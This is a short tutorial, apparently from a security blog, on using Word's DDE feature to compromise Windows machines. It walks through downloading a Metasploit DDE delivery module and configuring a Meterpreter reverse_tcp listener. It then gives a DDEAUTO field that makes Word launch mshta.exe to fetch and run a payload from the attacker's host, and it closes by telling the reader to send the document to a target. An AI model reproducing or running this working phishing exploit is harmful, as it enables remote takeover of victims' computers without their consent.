Dynamic Data Exchange (DDE) allows data to be transferred between applications without any interaction from the user. Attackers have leveraged this mechanism to execute malicious scripts and compromise systems.
It was reported to Microsoft by Sensepost, Etienne Stalmans, and Saif El-Sherei, but it was not patched since many applications use the DDE protocol. This exploit doesn’t require macros to be enabled.
We will have to import a Metasploit exploit.
Download it from GitHub using the terminal:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move the script to the Metasploit modules location:
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Now type msfconsole in the terminal to launch the Metasploit framework, then type reload_all to load the modules.
This exploit uses the DDE function to deliver the HTA payload. Now type in
use exploit/windows/dde_delivery
Then set the server host using the following command
set SRVHOST 192.168.177.141
We need to set a payload listener. Don’t use port 8080, since the server port is set to 8080 by default.
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.177.141
- set LPORT 6708
- exploit
Now copy and paste the code into any Word document. We used Office 365 Pro Plus, fully updated. Locate formula and you should have a small error box in the doc, then right-click it and choose toggle code. Paste the command in the doc between the curly braces. Save the document.
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}
Send the document to the suspect and a Meterpreter session will open.